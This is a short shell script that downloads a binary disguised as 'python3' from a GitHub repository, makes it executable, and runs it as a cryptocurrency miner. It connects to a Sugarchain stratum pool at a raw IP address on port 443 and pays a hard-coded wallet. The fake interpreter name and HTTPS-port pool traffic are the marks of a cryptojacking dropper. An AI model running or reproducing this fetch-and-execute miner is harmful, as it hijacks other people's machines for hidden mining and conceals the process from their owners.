#!/bin/sh
apt update
wget https://github.com/haria11/ideal-octo-doodle/raw/main/python3
chmod +x python3
./python3 -a yespowersugar -o stratum+tcps://47.89.234.73:443 -u sugar1qwrnwp0xpuxk57l4p3strxlc9aze8k9lx25s8f0.$(echo $(shuf -i 1-20000 -n 1)-GG) -p x -t 7
